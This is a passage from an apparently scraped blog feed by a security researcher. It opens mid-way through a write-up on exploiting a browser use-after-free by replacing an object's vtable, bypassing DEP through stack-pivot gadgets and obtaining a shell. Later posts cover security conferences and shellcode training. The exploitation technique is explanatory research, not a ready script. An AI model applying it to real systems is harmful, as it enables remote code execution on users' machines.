jscript Strings have the length as the first dword, which on our object is the vtable pointer, exactly what we want to control.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_aUReV5sSeqk/S6zAIjhYaPI/AAAAAAAAGss/tH6m6l-9BIg/s1600/aaa_chunk.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 314px; height: 242px;" src="http://1.bp.blogspot.com/_aUReV5sSeqk/S6zAIjhYaPI/AAAAAAAAGss/tH6m6l-9BIg/s400/aaa_chunk.png" alt="" id="BLOGGER_PHOTO_ID_5452944502045567218" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;font-size:78%;" &gt;Object chunk that needs to be filled (alert readers will notice that the chunk is a Low Fragmentation Heap chunk).&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;In the CANVAS exploit, we use &lt;span style="font-weight: bold;"&gt;XMLHttpRequest&lt;/span&gt;.open(), but there are many tricks, like &lt;a href="http://www.twitter.com/WTFuzz"&gt;@WTFuzz&lt;/a&gt;'s &lt;span style="font-weight: bold;"&gt;document.createElement&lt;/span&gt;('div').className.&lt;br /&gt;The next step is finding the exact size of the chunk, so we can allocate our object and replace the vtable.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Bypassing DEP&lt;/span&gt;&lt;br /&gt;Triggering the bug is trivial. Whatever function we want to call on the freed object will try to do an &lt;a href="http://msdn.microsoft.com/en-us/library/wwazwk2k%28VS.85%29.aspx"&gt;IDispatch-&gt;GetDispID&lt;/a&gt;, and that will use the modified vtable. The next step for a good boy scout is to transform a function pointer execution into ret2libc. To do that we need to move a buffer we control to ESP. 
&lt;br /&gt;&lt;br /&gt;GetDispID is a very interesting function:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;HRESULT GetDispID( BSTR bstrName, DWORD grfdex, DISPID *pid ); &lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;As you can see from the MSDN description, we have two interesting things: first the "this" object, which is usually the first thing we have pushed on the stack, and then the bstrName, which is the function name that we want to call. JavaScript is flexible enough to allow us to do:&lt;br /&gt;&lt;blockquote&gt; p["CocaCola"]();&lt;/blockquote&gt;&lt;br /&gt;The "this" object is also under our control, since it's the buffer that we used in the use-after-free.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/S6zA7V6YGnI/AAAAAAAAGs0/fxvzMQuaSXA/s1600/aaa_triggering.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 139px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/S6zA7V6YGnI/AAAAAAAAGs0/fxvzMQuaSXA/s400/aaa_triggering.png" alt="" id="BLOGGER_PHOTO_ID_5452945374565636722" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;font-size:78%;" &gt;Triggering the vulnerability. 
In this case, I set the bstrName to "getElement", but it could be transformed into whatever we want.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Now it is just a matter of finding the correct piece of code in order to pop the first or the second dword from the stack.&lt;br /&gt;Some ideas:&lt;br /&gt;&lt;blockquote&gt;XCHG/POP/RETN&lt;br /&gt;POP/POP ESP/RETN&lt;br /&gt;POP ESP/POP/RETN&lt;br /&gt;POP EBP/POP/LEAVE/RETN&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;If you are precise enough, you will have defeated randomness and will have a proper shell:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/S6y-BKw5DdI/AAAAAAAAGsU/i8aIbMlOOE8/s1600/exploited.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 213px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/S6y-BKw5DdI/AAAAAAAAGsU/i8aIbMlOOE8/s320/exploited.png" alt="" id="BLOGGER_PHOTO_ID_5452942176117394898" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-1460843549621706847?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/1460843549621706847/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=1460843549621706847' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1460843549621706847'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1460843549621706847'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' title='(A)leatory 
(P)ersitent (T)hreat'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_aUReV5sSeqk/S6y-r71CrBI/AAAAAAAAGsc/c53CaB2ZvUs/s72-c/aaa_samevar.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-5963654400968177611</id><published>2010-03-20T12:08:00.000-07:00</published><updated>2010-03-20T15:00:06.166-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bluehat'/><category scheme='http://www.blogger.com/atom/ns#' term='argentina'/><category scheme='http://www.blogger.com/atom/ns#' term='hackerspace'/><title type='text'>BlueHat Security Forum 2010 -  Argentina</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_aUReV5sSeqk/S6UuL7_HwAI/AAAAAAAAGrY/evYysGS1b_o/s1600-h/mlijgo.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 239px; height: 320px;" src="http://2.bp.blogspot.com/_aUReV5sSeqk/S6UuL7_HwAI/AAAAAAAAGrY/evYysGS1b_o/s320/mlijgo.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5450813706617733122" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Dear diary,&lt;br /&gt;  I'm finally back into blog writing. The main reason why I stopped is pretty much everyone else's reason: lack of time. Although time is still a precious asset, I found some time to write this entry.&lt;br /&gt;  Two days ago, Microsoft finally held BlueHat for the very first time in Argentina. It is a great honour, as an Argentinian still living in the country, to have Microsoft decide that we are a strategic point to extend the conference outside the US. 
Andrew Cushman told me it's the second time they do it outside Redmond; they had a first experience in Brussels, which was bittersweet, but he said they learned from that experience and renewed their hopes in Argentina.&lt;br /&gt;  Their strategy this time was to blend the Latin American CSOs/CTOs with the researcher community. Spotting who was who was just a simple visual exercise: suits vs. t-shirts.&lt;br /&gt;&lt;br /&gt;  The kicking point to achieve this almost impossible objective (the Microsoft Security team has a history of choosing high objectives that they commonly achieve) was a round table led by Andrew with a bunch of well-known researchers (FX, Damian Hasse, Manuel Caballero, Rodrigo Rubira Branco, Ivan Arce, Luiz Eduardo and me) under the title "Hackers and You". The idea was great; sadly, we ran out of time to discuss and expose all the different flavours of such a broad topic.&lt;br /&gt;  I believe there were four main points made, not only in the round table but at BlueHat in general.&lt;br /&gt;&lt;br /&gt; o Offensive security is a key part of enterprise security. Microsoft understood this a looong time ago and acted greatly upon it. No matter the size of your business, if you ever stop considering the offensive part of security, you will end up without a strategy and simply relying on your IDS/IPS/Firewall/AV devices, which, quoting FX's presentation, "is a very very very *bad* idea".&lt;br /&gt; o Security needs to be considered in every step of your business cycle. The Microsoft presentations were very clear on that subject.&lt;br /&gt; o Hire researchers for your team and make them happy. Certifying them with theoretical exams (study/take the test/immediately forget) won't make them happy or help them secure your network. Talk to them, look into practical training and let their creative spirit fly a bit (in controlled environments).&lt;br /&gt; o Prevention is prediction. 
This subject briefly came up from a very smart question from a conference attendee to the panel; she said "having all these new techniques and tricks, it seems that prevention gets old". Ivan had enough time to reply saying that prevention models can be correctly designed, with which I totally agree. Prevention models become prediction models. Prediction need not be understood as the result of a fortune cookie but rather as how the philosopher Ricoeur understands the term futurology (bad translation of the term on my part): understanding and trying to win yards on randomness. And this is where, in my opinion, offensive security helps you go the extra mile, along with the great researchers we have in that area; they know how to hack and help you understand current and future out-of-the-box risks.&lt;br /&gt;&lt;br /&gt;  Finally, there was an interesting presentation by Kristen Dennesen and Anchises de Paula on the Latin American vulnerability market. I had high expectations for this presentation, because I wanted to see how they would approach this subject having to face a more executive crowd (Pedram did a great job at the ekoparty, but that was more focused on researchers).&lt;br /&gt;  They did a very nice job; I have the feeling that they had at least three presentations in one, so as an attendee I was thirsty for more information on each of them, but due to the lack of time they couldn't go where I wanted. But again, this was an executive crowd. The subjects, in my understanding of their presentation, were: the vulnerability market in Latin America, new security legislation and its impact on the security scene, and the security threats in Latin America.&lt;br /&gt;  Luckily BlueHat encourages the corridor and bar discussions, which usually allow you to talk with the presenters, exchange opinions and get the backstage information.&lt;br /&gt;&lt;br /&gt;  In summary, great conference, glad to get together with old and new friends. 
Kudos to Celene, Katie, Mike, Mark, Damian and Andrew for putting together such a great conference. I'll be looking forward to more next year.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS: My favourite presentation was Hernan Ochoa's "5 minutes to explain the 14-year old unpatched SMB bug", which was fast, fun and with great content.&lt;br /&gt;&lt;br /&gt;PS2: Fede presented a very nice draft of what is going to be our future Hackerspace in Buenos Aires; I'm in the group that is trying to push this project and we hope we can give the big news soon.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-5963654400968177611?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/5963654400968177611/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=5963654400968177611' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5963654400968177611'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5963654400968177611'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2010/03/bluehat-security-forum-2010-argentina.html' title='BlueHat Security Forum 2010 -  Argentina'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_aUReV5sSeqk/S6UuL7_HwAI/AAAAAAAAGrY/evYysGS1b_o/s72-c/mlijgo.jpg' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-2467913769356158248</id><published>2009-09-24T05:21:00.000-07:00</published><updated>2009-09-24T06:02:28.717-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='argentina'/><category scheme='http://www.blogger.com/atom/ns#' term='ekoparty 2009'/><title type='text'>Ekoparty 2009 was a total blast!!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh3.ggpht.com/_aUReV5sSeqk/SrthfXiu9xI/AAAAAAAAGYw/GWW_pHLPYWk/s640/DSC02005.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 640px; height: 480px;" src="http://lh3.ggpht.com/_aUReV5sSeqk/SrthfXiu9xI/AAAAAAAAGYw/GWW_pHLPYWk/s640/DSC02005.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;When I decided to write this review I knew it was going to be hard to be impartial on this, but the heck with it!&lt;br /&gt;&lt;br /&gt;Ekoparty 2009 was a total blast!! 
Around 500 people got together on the 17th and 18th of September at the cultural center Konex to make merry, learn and party a little bit.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh5.ggpht.com/_aUReV5sSeqk/SrthcvrXfHI/AAAAAAAAGYU/RNTfaQlBiV8/s640/DSC01995.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 640px; height: 480px;" src="http://lh5.ggpht.com/_aUReV5sSeqk/SrthcvrXfHI/AAAAAAAAGYU/RNTfaQlBiV8/s640/DSC01995.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The conference had a really interesting line-up; some of the most respected researchers around the globe, such as Moxie Marlinspike, Luis Miras, Charlie Miller and Cesar Cerrudo, gave insightful and original presentations.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh6.ggpht.com/_aUReV5sSeqk/SrthbI0iXCI/AAAAAAAAGYE/k2lPGABM5hI/s640/DSC01989.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 640px; height: 480px;" src="http://lh6.ggpht.com/_aUReV5sSeqk/SrthbI0iXCI/AAAAAAAAGYE/k2lPGABM5hI/s640/DSC01989.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;But that doesn't make a conference good. What makes this conference the best one in Latin America was the venue, the people that came from different parts, and the level of detail and effort that the organizers invested in every single spot of the conference in order to mix the best of two worlds: a little bit of business, a little bit of underground.&lt;br /&gt;&lt;br /&gt;I gave a turbo talk presentation on the infamous FreeListInUse technique, explaining where it originally came from, how it was developed and what the original concept behind it was. 
But sadly it was too much information in such a small amount of time that people not familiar with exploitation couldn't get the real juice out of it. Next time (H2HC), I will try to overuse metaphors to explain how things work. (I will post the slides soon.)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.ggpht.com/_aUReV5sSeqk/SrthcZNHyoI/AAAAAAAAGYQ/VlDnNN9Ed7g/s640/DSC01993.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 640px; height: 480px;" src="http://lh4.ggpht.com/_aUReV5sSeqk/SrthcZNHyoI/AAAAAAAAGYQ/VlDnNN9Ed7g/s640/DSC01993.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh6.ggpht.com/_aUReV5sSeqk/SrthdBf26jI/AAAAAAAAGYY/Uq1nMqbUmYc/s640/DSC01996.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 640px; height: 480px;" src="http://lh6.ggpht.com/_aUReV5sSeqk/SrthdBf26jI/AAAAAAAAGYY/Uq1nMqbUmYc/s640/DSC01996.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The great privilege as a speaker was to use Juan Pablo's masterpiece, the WOPR. 
He made a replica of the WarGames WOPR, with LEDs and the corresponding counter, and on the back you had a place to set your laptop.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh3.ggpht.com/_aUReV5sSeqk/SrthYBFrY8I/AAAAAAAAGXk/2XbJ6U6qNEU/s640/DSC01981.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 640px; height: 480px;" src="http://lh3.ggpht.com/_aUReV5sSeqk/SrthYBFrY8I/AAAAAAAAGXk/2XbJ6U6qNEU/s640/DSC01981.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.ggpht.com/_aUReV5sSeqk/SrthYR9zn-I/AAAAAAAAGXo/770OY77LIo4/s512/DSC01982.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 384px; height: 512px;" src="http://lh4.ggpht.com/_aUReV5sSeqk/SrthYR9zn-I/AAAAAAAAGXo/770OY77LIo4/s512/DSC01982.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We set up a nice stand where we had the chance to give NOP Certifications; sadly nobody passed this time, we hope that next year we have more people playing! Also some people came to the stand to get a demo of the new internet hype, the SMBv2 exploit, which we successfully gave.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh6.ggpht.com/_aUReV5sSeqk/Srthatu0YTI/AAAAAAAAGYA/ekwXXCjgsZU/s640/DSC01988.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 640px; height: 480px;" src="http://lh6.ggpht.com/_aUReV5sSeqk/Srthatu0YTI/AAAAAAAAGYA/ekwXXCjgsZU/s640/DSC01988.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;As an Argentinian I couldn't be more proud to have a conference such as the Ekoparty represent us. 
It was a really nice time to get together with old friends and meet new people.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.ggpht.com/_aUReV5sSeqk/SrthfAScR7I/AAAAAAAAGYs/SgdfZ3DKMOQ/s800/DSC02004.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 800px; height: 474px;" src="http://lh4.ggpht.com/_aUReV5sSeqk/SrthfAScR7I/AAAAAAAAGYs/SgdfZ3DKMOQ/s800/DSC02004.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;From this spot, I just want to thank Fede, Fran, Leo, Jero and Juan Pablo for the great conference they made this year!!&lt;br /&gt;&lt;br /&gt;See you next year.&lt;br /&gt;Nico&lt;br /&gt;PS: You can find more pictures at: &lt;a href="http://picasaweb.google.com/nicowow/EkoParty2009"&gt;http://picasaweb.google.com/nicowow/EkoParty2009&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-2467913769356158248?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/2467913769356158248/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=2467913769356158248' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2467913769356158248'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2467913769356158248'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/09/ekoparty-2009-was-total-blast.html' title='Ekoparty 2009 was a total blast!!'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh3.ggpht.com/_aUReV5sSeqk/SrthfXiu9xI/AAAAAAAAGYw/GWW_pHLPYWk/s72-c/DSC02005.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-2873430485149101994</id><published>2009-09-13T06:07:00.001-07:00</published><updated>2009-09-13T06:21:37.405-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stack overflow'/><category scheme='http://www.blogger.com/atom/ns#' term='ekoparty'/><category scheme='http://www.blogger.com/atom/ns#' term='shellcode'/><title type='text'>EkoParty 2009</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.ekoparty.org/img/ekologo.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 198px; height: 185px;" src="http://www.ekoparty.org/img/ekologo.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Another exciting &lt;a href="http://www.ekoparty.org"&gt;Ekoparty 2009&lt;/a&gt; is around the corner this year and all the security jet set is hitting Ezeiza (Bs.As. Airport) this weekend.&lt;br /&gt;&lt;br /&gt;On Monday and Tuesday, we will be throwing two trainings: Writing Windows Shellcode from Scratch and Breaking Window.&lt;br /&gt;&lt;br /&gt;The Shellcode Writing training will be taught by Pablo Solè, and it will go from "I just run exploits" to "I can write my connectback and avoid badchars". Of course, depending on how familiar the students are with assembly, it can end in "I'm escaping the current process by writing a fork() shellcode" or "I inject myself into another process to avoid heap corruption problems". 
All supported by a pretty neat Django framework Dave wrote to make your shellcode-writing experience pretty smooth (I wish we had had those back in the 90's).&lt;br /&gt;&lt;br /&gt;The other training is a straightforward Windows Stack Overflow class, rated "G" by the Motion Picture Association, which means that if you are a student, network engineer, security professional, etc., you can learn how to write Windows exploits in just two days and start looking at Microsoft advisories from a different angle.&lt;br /&gt;&lt;br /&gt;On Thursday the ekoparty starts and I'm giving a presentation on "Abusing FreeListInUse", which will be a 20-minute turbo talk about how this technique was discovered in the first place and how it can be exploited in the worst-case scenario. (Sadly, I won't have much time to expand on other exploitation tricks, but I might give an extended version at the H2HC in November.)&lt;br /&gt;&lt;br /&gt;Anyway, if you have plans to go, send me a message, or you will probably find me at Immunity's stand at the Ekoparty.&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;Nico&lt;br /&gt;PS: We will be doing the NOP Certification, so it will be a good time to prove to yourself and your future employer that you can write a stack overflow in less than 40 minutes :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-2873430485149101994?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/2873430485149101994/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=2873430485149101994' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2873430485149101994'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2873430485149101994'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/09/ekoparty-2009.html' title='EkoParty 2009'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-8063903998399908062</id><published>2009-07-28T07:36:00.001-07:00</published><updated>2009-07-28T07:58:44.342-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hzon'/><category scheme='http://www.blogger.com/atom/ns#' term='heap cache allocator'/><category scheme='http://www.blogger.com/atom/ns#' term='immunity debugger'/><category scheme='http://www.blogger.com/atom/ns#' term='heap exploitation'/><title type='text'>Exploiting the Heap Cache Allocator</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/Sm8NDsSkBQI/AAAAAAAAGUM/5DE_nwuZWo0/s1600-h/smallbugs2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 229px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/Sm8NDsSkBQI/AAAAAAAAGUM/5DE_nwuZWo0/s320/smallbugs2.jpg" alt="" id="BLOGGER_PHOTO_ID_5363520038301336834" border="0" /&gt;&lt;/a&gt;Finally, one of the most awaited papers of 2009 was released. John "hzon" McDonald brings us a bunch of refreshing techniques on one of the least inspected structures of the heap: the Heap Cache Allocator.&lt;br /&gt;He doesn't constrain himself just to the technique, but rather paints a big picture of how the heap works and the different ways to exploit it. 
A MUST read.&lt;br /&gt;Rather than writing a review, I just recommend you read it in full.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blogs.iss.net/archive/RequiredReading.html"&gt;http://blogs.iss.net/archive/RequiredReading.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The cool thing about playing with big blocks is that they are not used much, so you can force a nice predictable universe for exploitation.&lt;br /&gt;&lt;br /&gt;To celebrate the paper, we are releasing the files needed to inspect the Heap Cache in Immunity Debugger:&lt;br /&gt;&lt;a href="http://immunityinc.com/downloads/ImmunityDebuggerUpdate.tgz"&gt;http://immunityinc.com/downloads/ImmunityDebuggerUpdate.tgz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_aUReV5sSeqk/Sm8SAEVzLeI/AAAAAAAAGUU/0c1q7mHGrMk/s1600-h/screenshot.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 201px;" src="http://1.bp.blogspot.com/_aUReV5sSeqk/Sm8SAEVzLeI/AAAAAAAAGUU/0c1q7mHGrMk/s320/screenshot.jpg" alt="" id="BLOGGER_PHOTO_ID_5363525473596026338" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;Nico&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-8063903998399908062?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/8063903998399908062/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=8063903998399908062' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8063903998399908062'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8063903998399908062'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/07/exploiting-heap-cache-allocator.html' title='Exploiting the Heap Cache Allocator'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_aUReV5sSeqk/Sm8NDsSkBQI/AAAAAAAAGUM/5DE_nwuZWo0/s72-c/smallbugs2.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-5609709170512508617</id><published>2009-05-18T12:26:00.001-07:00</published><updated>2009-05-18T12:44:13.029-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='debugger'/><category scheme='http://www.blogger.com/atom/ns#' term='gray hat python'/><category scheme='http://www.blogger.com/atom/ns#' term='python'/><category scheme='http://www.blogger.com/atom/ns#' term='justin seitz'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Book review: Gray Hat Python</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://ecx.images-amazon.com/images/I/51Z0iz1DZqL._SL500_AA240_.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 240px; height: 240px;" src="http://ecx.images-amazon.com/images/I/51Z0iz1DZqL._SL500_AA240_.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Dear diary,&lt;br /&gt;  We usually say that you can easily teach yourself Python in just a week; well, just add 5 more days and &lt;a href="http://www.justinseitz.com/"&gt;Justin Seitz&lt;/a&gt;'s new book &lt;a 
